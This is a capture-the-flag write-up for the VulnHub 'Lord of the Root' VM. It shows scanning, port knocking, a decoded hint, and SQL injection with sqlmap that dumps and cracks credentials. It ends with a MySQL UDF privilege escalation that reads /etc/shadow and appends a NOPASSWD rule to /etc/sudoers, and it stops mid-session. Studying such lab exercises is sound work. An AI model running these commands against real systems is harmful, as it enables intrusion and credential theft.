VulnHub: Lord of the Root Solution
Greetingz! This is a quick and dirty solution for the Lord of the Root boot-to-root VM challenge. Enjoy! -1N3
DOWNLOAD
https://www.vulnhub.com/entry/lord-of-the-root-101,129/
DISCOVERY
# netdiscover -r 192.168.1.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 282 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------------------- 192.168.1.101 00:0c:29:8c:bd:7b 01 042 VMware, Inc.
ENUMERATION
____ _________ / _/___ ___ _____ / ___/ __ \ / // __ \/ _ \/ ___/ (__ ) / / // // /_/ / __/ / /____/_/ /_/___/ .___/\___/_/ /_/ + -- --=[http://xerosecurity.com + -- --=[sn1per v1.6 by 1N3 ################################### Running recon ################################# Server: 206.248.154.22 Address: 206.248.154.22#53 ** server can't find 101.1.168.192.in-addr.arpa: NXDOMAIN Host 101.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN) ################################### Pinging host ################################### PING 192.168.1.101 (192.168.1.101) 56(84) bytes of data. --- 192.168.1.101 ping statistics --- 1 packets transmitted, 0 received, 100% packet loss, time 0ms ################################### Running port scan ############################## Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:00 EST Nmap scan report for 192.168.1.101 Host is up (0.00026s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA) | 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA) |_ 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA) MAC Address: 00:0C:29:8C:BD:7B (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.10 - 3.19, Linux 3.2 - 4.0 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.25 ms 192.168.1.101 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 90.69 seconds Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:02 EST Nmap scan report for 192.168.1.101 Host is up (0.00025s latency). PORT STATE SERVICE VERSION 53/udp open|filtered domain 67/udp open|filtered dhcps 68/udp open|filtered dhcpc 88/udp open|filtered kerberos-sec 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 139/udp open|filtered netbios-ssn 161/udp open|filtered snmp | snmp-hh3c-logins: |_ baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1 162/udp open|filtered snmptrap 389/udp open|filtered ldap 520/udp open|filtered route 2049/udp open|filtered nfs MAC Address: 00:0C:29:8C:BD:7B (VMware) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.25 ms 192.168.1.101 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 124.99 seconds
SSH BANNER
Since our only open port was SSH, I decided to ssh and see what options or hints were available…
[email protected]:~# ssh 192.168.1.101 .____ _____________________________ | | \_____ \__ ___/\______ \ | | / | \| | | _/ | |___/ | \ | | | \ |_______ \_______ /____| |____|_ / \/ \/ \/ ____ __. __ ___________ .__ .___ ___________ ___________ __ | |/ _| ____ ____ ____ | | __ \_ _____/______|__| ____ ____ __| _/ \__ ___/___ \_ _____/ _____/ |_ ___________ | < / \ / _ \_/ ___\| |/ / | __) \_ __ \ |/ __ \ / \ / __ | | | / _ \ | __)_ / \ __\/ __ \_ __ \ | | \| | ( <_> ) \___| < | \ | | \/ \ ___/| | \/ /_/ | | |( <_> ) | \ | \ | \ ___/| | \/ |____|__ \___| /\____/ \___ >__|_ \ \___ / |__| |__|\___ >___| /\____ | |____| \____/ /_______ /___| /__| \___ >__| \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ Easy as 1,2,3
PORT KNOCKING
As the SSH banner hints at, it seems that we would need to use port knocking in order to unlock any other hidden services running on the target.
[email protected]:/pentest/loot# knock 192.168.1.101 1 2 3 [email protected]:/pentest/loot# sniper 192.168.1.101 [3;J ____ _________ / _/___ ___ _____ / ___/ __ \ / // __ \/ _ \/ ___/ (__ ) / / // // /_/ / __/ / /____/_/ /_/___/ .___/\___/_/ /_/ + -- --=[http://xerosecurity.com + -- --=[sn1per v1.6 by 1N3 ################################### Running recon ################################# Server: 206.248.154.22 Address: 206.248.154.22#53 ** server can't find 101.1.168.192.in-addr.arpa: NXDOMAIN Host 101.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN) ################################### Pinging host ################################### PING 192.168.1.101 (192.168.1.101) 56(84) bytes of data. --- 192.168.1.101 ping statistics --- 1 packets transmitted, 0 received, 100% packet loss, time 0ms ################################### Running port scan ############################## Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:16 EST Nmap scan report for 192.168.1.101 Host is up (0.00022s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA) | 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA) |_ 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA) 1337/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Site doesn't have a title (text/html). MAC Address: 00:0C:29:8C:BD:7B (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.10 - 3.19, Linux 3.2 - 4.0 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.22 ms 192.168.1.101 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 101.71 seconds Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:18 EST Nmap scan report for 192.168.1.101 Host is up (0.00020s latency). PORT STATE SERVICE VERSION 53/udp open|filtered domain 67/udp open|filtered dhcps 68/udp open|filtered dhcpc 88/udp open|filtered kerberos-sec 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 139/udp open|filtered netbios-ssn 161/udp open|filtered snmp | snmp-hh3c-logins: |_ baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1 162/udp open|filtered snmptrap 389/udp open|filtered ldap 520/udp open|filtered route 2049/udp open|filtered nfs MAC Address: 00:0C:29:8C:BD:7B (VMware) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.20 ms 192.168.1.101 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 122.93 seconds
INTERESTING RESPONSE
Now that we have an open Apache server listening on 1337/tcp, I quickly discovered an interesting response in the 404 pages..
HTTP/1.1 404 Not Found Date: Sat, 16 Jan 2016 00:01:17 GMT Server: Apache/2.4.7 (Ubuntu) Last-Modified: Fri, 18 Sep 2015 03:47:34 GMT ETag: "74-51ffd64576fc7" Accept-Ranges: bytes Content-Length: 116 Connection: close Content-Type: text/html < html> < img src="/images/hipster.jpg" align="middle"> < !--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh> < /html>
DECODED MESSAGE
It seemed strange to have an encoded message in the HTML comments of the 404 page so I knew this was a hint and could likely be decoded. Sure enough, it appeared to be a double-encoded base64 string.
THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh = Lzk3ODM0NTIxMC9pbmRleC5waHA= Lzk3ODM0NTIxMC9pbmRleC5waHA= = /978345210/index.php
LOGIN PAGE
Now that we decoded a message that seems to be reveal a hidden login page, the next obvious step was to either try some form of SQLi or auth bypass or brute force method to get further…
POST /978345210/index.php HTTP/1.1 Host: 192.168.1.101:1337 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.101:1337/978345210/index.php Cookie: PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 42 username=user&password=pass&submit=+Login+ HTTP/1.1 200 OK Date: Fri, 15 Jan 2016 23:37:34 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 516 Connection: close Content-Type: text/html < !DOCTYPE html> < html> < head> < title>LOTR Login!< /title> < /head> < body> < div id="main"> < h1>Welcome to the Gates of Mordor< /h1> < div id="login"> < form action="" method="post"> < label>User :< /label> < input id="name" name="username" placeholder="username" type="text">< br> < label>Password :< /label> < input id="password" name="password" placeholder="**********" type="password"> < br> < input name="submit" type="submit" value=" Login "> < span>Username or Password is invalid< /span> < /form> < /div> < /div> < /body> < /html>
SQL INJECTION VULNERABILITY
Scanning with Burpsuite quickly revealed that the login for was vulnerable to SQL injection.
SQL INJECTION EXPLOITATION
Using SQLMap, we can dig into the DB and see what else we can find.
[email protected]:~# sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --data='username=user&password=pass&submit=+Login+' --cookie='PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX' --level=5 --risk=3 _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201601080a89} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 19:09:48 [19:09:48] [INFO] testing connection to the target URL [19:09:48] [INFO] heuristics detected web page charset 'ascii' [19:09:48] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS [19:09:48] [INFO] testing if the target URL is stable [19:09:49] [INFO] target URL is stable [19:09:49] [INFO] testing if POST parameter 'username' is dynamic [19:09:49] [WARNING] POST parameter 'username' does not appear dynamic [19:09:49] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable [19:09:49] [INFO] testing for SQL injection on POST parameter 'username' [19:10:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' [19:10:31] [INFO] POST parameter 'username' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y [19:10:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [19:10:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found sqlmap got a 302 redirect to 'http://192.168.1.101:1337/978345210/profile.php'. Do you want to follow? [Y/n] y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y [19:10:43] [INFO] target URL appears to be UNION injectable with 1 columns [19:10:43] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') [19:10:43] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns' [19:10:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns' [19:10:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns' [19:10:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns' [19:10:47] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns' [19:10:48] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns' [19:10:49] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns' [19:10:50] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns' [19:10:52] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns' [19:10:53] [INFO] checking if the injection point on POST parameter 'username' is a false positive POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 5852 HTTP(s) requests: --- Parameter: username (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: username=user' AND (SELECT * FROM (SELECT(SLEEP(5)))wUmu) AND 'mbXF'='mbXF&password=pass&submit= Login --- [19:13:04] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL 5.0.12 [19:13:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.101' [*] shutting down at 19:13:04 [email protected]:~# sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --data='username=user&password=pass&submit=+Login+' --cookie='PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX' --level=5 --risk=3 --all _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201601080a89} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 19:14:15 [19:14:16] [INFO] resuming back-end DBMS 'mysql' [19:14:16] [INFO] testing connection to the target URL [19:14:16] [INFO] heuristics detected web page charset 'ascii' sqlmap got a 302 redirect to 'http://192.168.1.101:1337/978345210/profile.php'. Do you want to follow? [Y/n] y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y [19:14:18] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS sqlmap resumed the following injection point(s) from stored session: --- Parameter: username (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: username=user' AND (SELECT * FROM (SELECT(SLEEP(5)))wUmu) AND 'mbXF'='mbXF&password=pass&submit= Login --- [19:14:18] [INFO] the back-end DBMS is MySQL [19:14:18] [INFO] fetching banner [19:14:18] [WARNING] time-based comparison requires larger statistical model, please wait.............................. [19:14:19] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y [19:14:39] [INFO] adjusting time delay to 1 second due to good response times 5.5.44-0ubuntu0.14.04.1 web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS operating system: Linux Ubuntu back-end DBMS: MySQL 5.0.12 banner: '5.5.44-0ubuntu0.14.04.1' [19:16:13] [INFO] fetching current user [19:16:13] [INFO] retrieved: [email protected] current user: '[email protected]' [19:17:23] [INFO] fetching current database [19:17:23] [INFO] retrieved: Webapp current database: 'Webapp' [19:17:50] [INFO] fetching server hostname [19:17:50] [INFO] retrieved: LordOfTheRoot hostname: 'LordOfTheRoot' [19:18:50] [INFO] testing if current user is DBA [19:18:50] [INFO] fetching current user current user is DBA: True [19:18:51] [INFO] fetching database users [19:18:51] [INFO] fetching number of database users [19:18:51] [INFO] retrieved: 5 [19:18:53] [INFO] retrieved: 'root'@'localhost' [19:20:16] [INFO] retrieved: 'root'@'lordoftheroot' [19:22:01] [INFO] retrieved: 'root'@'127.0.0.1' [19:23:18] [INFO] retrieved: 'root'@'::1' [19:24:10] [INFO] retrieved: 'debian-sys-maint'@'localhost' database management system users [5]: [*] 'debian-sys-maint'@'localhost' [*] 'root'@'127.0.0.1' [*] 'root'@'::1' [*] 'root'@'localhost' [*] 'root'@'lordoftheroot' [19:26:15] [INFO] fetching database users password hashes [19:26:15] [INFO] fetching database users [19:26:15] [INFO] fetching number of password hashes for user 'root' [19:26:15] [INFO] retrieved: 1 [19:26:17] [INFO] fetching password hashes for user 'root' [19:26:17] [INFO] retrieved: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F [19:28:32] [INFO] fetching number of password hashes for user 'debian-sys-maint' [19:28:32] [INFO] retrieved: 1 [19:28:33] [INFO] fetching password hashes for user 'debian-sys-maint' [19:28:33] [INFO] retrieved: *A55A9B9049F69BC2768C9284615361DFBD580B34 do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y [19:31:27] [INFO] writing hashes to a temporary file '/tmp/sqlmapmR6GTw22036/sqlmaphashes-GwopYC.txt' do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y [19:31:32] [INFO] using hash method 'mysql_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 1 [19:31:34] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] y [19:31:38] [INFO] starting dictionary-based cracking (mysql_passwd) [19:31:38] [INFO] starting 8 processes [19:31:40] [INFO] cracked password 'darkshadow' for user 'root' database management system users password hashes: [*] debian-sys-maint [1]: password hash: *A55A9B9049F69BC2768C9284615361DFBD580B34 [*] root [1]: password hash: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F clear-text password: darkshadow [19:35:14] [INFO] fetching database users privileges [19:35:14] [INFO] fetching database users [21:13:23] [INFO] fetching columns for table 'Users' in database 'Webapp' [21:13:23] [INFO] retrieved: 3 [21:13:27] [INFO] retrieved: id [21:13:37] [INFO] retrieved: username [21:14:14] [INFO] retrieved: password [21:14:56] [INFO] fetching entries for table 'Users' in database 'Webapp' [21:14:56] [INFO] fetching number of entries for table 'Users' in database 'Webapp' [21:14:56] [INFO] retrieved: 5 [21:14:59] [INFO] retrieved: 1 [21:15:03] [INFO] retrieved: iwilltakethering [21:16:23] [INFO] retrieved: frodo [21:16:51] [INFO] retrieved: 2 [21:16:55] [INFO] retrieved: MyPreciousR00t [21:18:05] [INFO] retrieved: smeagol [21:18:39] [INFO] retrieved: 3 [21:18:44] [INFO] retrieved: AndMySword [21:19:32] [INFO] retrieved: aragorn [21:20:05] [INFO] retrieved: 4 [21:20:10] [INFO] retrieved: AndMyBow [21:20:45] [INFO] retrieved: legolas [21:21:20] [INFO] retrieved: 5 [21:21:24] [INFO] retrieved: AndMyAxe [21:21:57] [INFO] retrieved: gimli [21:22:20] [INFO] analyzing table dump for possible password hashes Database: Webapp Table: Users [5 entries] +----+----------+------------------+ | id | username | password | +----+----------+------------------+ | 1 | frodo | iwilltakethering | | 2 | smeagol | MyPreciousR00t | | 3 | aragorn | AndMySword | | 4 | legolas | AndMyBow | | 5 | gimli | AndMyAxe | +----+----------+------------------+ [21:22:20] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.sqlmap/output/192.168.1.101/dump/Webapp/Users.csv'
SSH LOGIN
Now that we have lots of credentials and clear-text passwords, the next obvious route was to re-try logging in with the accounts over SSH…
[email protected]:~# ssh [email protected] .____ _____________________________ | | \_____ \__ ___/\______ \ | | / | \| | | _/ | |___/ | \ | | | \ |_______ \_______ /____| |____|_ / \/ \/ \/ ____ __. __ ___________ .__ .___ ___________ ___________ __ | |/ _| ____ ____ ____ | | __ \_ _____/______|__| ____ ____ __| _/ \__ ___/___ \_ _____/ _____/ |_ ___________ | < / \ / _ \_/ ___\| |/ / | __) \_ __ \ |/ __ \ / \ / __ | | | / _ \ | __)_ / \ __\/ __ \_ __ \ | | \| | ( <_> ) \___| < | \ | | \/ \ ___/| | \/ /_/ | | |( <_> ) | \ | \ | \ ___/| | \/ |____|__ \___| /\____/ \___ >__|_ \ \___ / |__| |__|\___ >___| /\____ | |____| \____/ /_______ /___| /__| \___ >__| \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ Easy as 1,2,3 [email protected]'s password: Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686) * Documentation: https://help.ubuntu.com/ .____ _____________________________ | | \_____ \__ ___/\______ \ | | / | \| | | _/ | |___/ | \ | | | \ |_______ \_______ /____| |____|_ / \/ \/ \/ __ __ .__ ___________ .__ .___ / \ / \ ____ | | ____ ____ _____ ____ \_ _____/______|__| ____ ____ __| _/ \ \/\/ // __ \| | _/ ___\/ _ \ / \_/ __ \ | __) \_ __ \ |/ __ \ / \ / __ | \ /\ ___/| |_\ \__( <_> ) Y Y \ ___/ | \ | | \/ \ ___/| | \/ /_/ | \__/\ / \___ >____/\___ >____/|__|_| /\___ > \___ / |__| |__|\___ >___| /\____ | \/ \/ \/ \/ \/ \/ \/ \/ \/ Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135 [email protected]:~$ ls Desktop Documents Downloads examples.desktop Music Pictures Public Templates Videos [email protected]:~$ uname -a Linux LordOfTheRoot 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux [email protected]:~$ sudo su [sudo] password for smeagol: smeagol is not in the sudoers file. This incident will be reported. [email protected]:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false messagebus:x:102:106::/var/run/dbus:/bin/false usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/misc:/bin/false avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false saned:x:108:115::/home/saned:/bin/false whoopsie:x:109:116::/nonexistent:/bin/false speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh avahi:x:111:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false lightdm:x:112:118:Light Display Manager:/var/lib/lightdm:/bin/false colord:x:113:121:colord colour management daemon,,,:/var/lib/colord:/bin/false hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false smeagol:x:1000:1000:smeagol,,,:/home/smeagol:/bin/bash mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin [email protected]:~$
MYSQL USER DEFINED FUNCTIONS PRIVILEGE ESCALATION
Now that we have a full SSH shell to the target, the next route to root is privilege escalation. Since I had the local root password from the SQL DB and a full SSH shell, I decided the quickest way would be to use a user-defined function via the MySQL UDF exploit.
gcc -g -c raptor_udf2.c gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc mysql -u root -p use mysql; create table foo(line blob); insert into foo values(load_file('/tmp/raptor_udf2.so')); select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; create function do_system returns integer soname 'raptor_udf2.so'; select * from mysql.func; mysql> SELECT do_system('cat /etc/shadow'); +------------------------------+ | do_system('cat /etc/shadow') | +------------------------------+ | 0 | +------------------------------+ 1 row in set (0.01 sec) mysql> select do_system('cat /etc/shadow > /tmp/shadow'); +--------------------------------------------+ | do_system('cat /etc/shadow > /tmp/shadow') | +--------------------------------------------+ | 0 | +--------------------------------------------+ 1 row in set (0.01 sec) mysql> select do_system('chmod 777 /tmp/shadow'); +------------------------------------+ | do_system('chmod 777 /tmp/shadow') | +------------------------------------+ | 0 | +------------------------------------+ 1 row in set (0.02 sec) [email protected]:/tmp$ cat shadow root:$6$cQPCchYp$rWjOEHF47iuaGk/DQdkG6Dhhfm3.hTaNZPO4MoyBz2.bn44fERcQ23XCsp43LOt5NReEUjwDF8WDa5i1ML2jH.:16695:0:99999:7::: daemon:*:16652:0:99999:7::: bin:*:16652:0:99999:7::: sys:*:16652:0:99999:7::: sync:*:16652:0:99999:7::: games:*:16652:0:99999:7::: man:*:16652:0:99999:7::: lp:*:16652:0:99999:7::: mail:*:16652:0:99999:7::: news:*:16652:0:99999:7::: uucp:*:16652:0:99999:7::: proxy:*:16652:0:99999:7::: www-data:*:16652:0:99999:7::: backup:*:16652:0:99999:7::: list:*:16652:0:99999:7::: irc:*:16652:0:99999:7::: gnats:*:16652:0:99999:7::: nobody:*:16652:0:99999:7::: libuuid:!:16652:0:99999:7::: syslog:*:16652:0:99999:7::: messagebus:*:16652:0:99999:7::: usbmux:*:16652:0:99999:7::: dnsmasq:*:16652:0:99999:7::: avahi-autoipd:*:16652:0:99999:7::: kernoops:*:16652:0:99999:7::: rtkit:*:16652:0:99999:7::: saned:*:16652:0:99999:7::: whoopsie:*:16652:0:99999:7::: speech-dispatcher:!:16652:0:99999:7::: avahi:*:16652:0:99999:7::: lightdm:*:16652:0:99999:7::: colord:*:16652:0:99999:7::: hplip:*:16652:0:99999:7::: pulse:*:16652:0:99999:7::: smeagol:$6$vu8Pfezj$6ldY35ytL8yRd.Gp947FnW3t/WrMZXIL7sqTQS4wuSKeAiYeoYCy7yfS2rBpAPvFCPuo73phXmpOoLsg5REXz.:16695:0:99999:7::: mysql:!:16695:0:99999:7::: sshd:*:16696:0:99999:7::: mysql> SELECT do_system('echo "smeagol ALL=NOPASSWD: ALL" >> /etc/sudoers'); +---------------------------------------------------------------+ | do_system('echo "smeagol ALL=NOPASSWD: ALL" >> /etc/sudoers') | +---------------------------------------------------------------+ | 0 | +---------------------------------------------------------------+ 1 row in set (0.00 sec) mysql>
GAME OVER!
Since the MySQL daemon was running as “root” and our custom function allows us to execute commands, the quickest way to root was to either dump the /etc/shadow file and crack the root password or add the current user to the sudoers file.
[email protected]:/tmp$ sudo su [email protected]:/tmp# whoami root [email protected]:/tmp# cd /root [email protected]:~# ls buf buf.c Flag.txt other other.c switcher.py [email protected]:~# cat Flag.txt “There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.” – Gandalf [email protected]:~#
GOING THE EXTRA MILE
[email protected]:~# ssh [email protected] The authenticity of host '192.168.1.138 (192.168.1.138)' can't be established. ECDSA key fingerprint is f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.1.138' (ECDSA) to the list of known hosts. .____ _____________________________ | | \_____ \__ ___/\______ \ | | / | \| | | _/ | |___/ | \ | | | \ |_______ \_______ /____| |____|_ / \/ \/ \/ ____ __. __ ___________ .__ .___ ___________ ___________ __ | |/ _| ____ ____ ____ | | __ \_ _____/______|__| ____ ____ __| _/ \__ ___/___ \_ _____/ _____/ |_ ___________ | < / \ / _ \_/ ___\| |/ / | __) \_ __ \ |/ __ \ / \ / __ | | | / _ \ | __)_ / \ __\/ __ \_ __ \ | | \| | ( <_> ) \___| < | \ | | \/ \ ___/| | \/ /_/ | | |( <_> ) | \ | \ | \ ___/| | \/ |____|__ \___| /\____/ \___ >__|_ \ \___ / |__| |__|\___ >___| /\____ | |____| \____/ /_______ /___| /__| \___ >__| \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ Easy as 1,2,3 [email protected]'s password: Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686) * Documentation: https://help.ubuntu.com/ 261 packages can be updated. 128 updates are security updates. .____ _____________________________ | | \_____ \__ ___/\______ \ | | / | \| | | _/ | |___/ | \ | | | \ |_______ \_______ /____| |____|_ / \/ \/ \/ __ __ .__ ___________ .__ .___ / \ / \ ____ | | ____ ____ _____ ____ \_ _____/______|__| ____ ____ __| _/ \ \/\/ // __ \| | _/ ___\/ _ \ / \_/ __ \ | __) \_ __ \ |/ __ \ / \ / __ | \ /\ ___/| |_\ \__( <_> ) 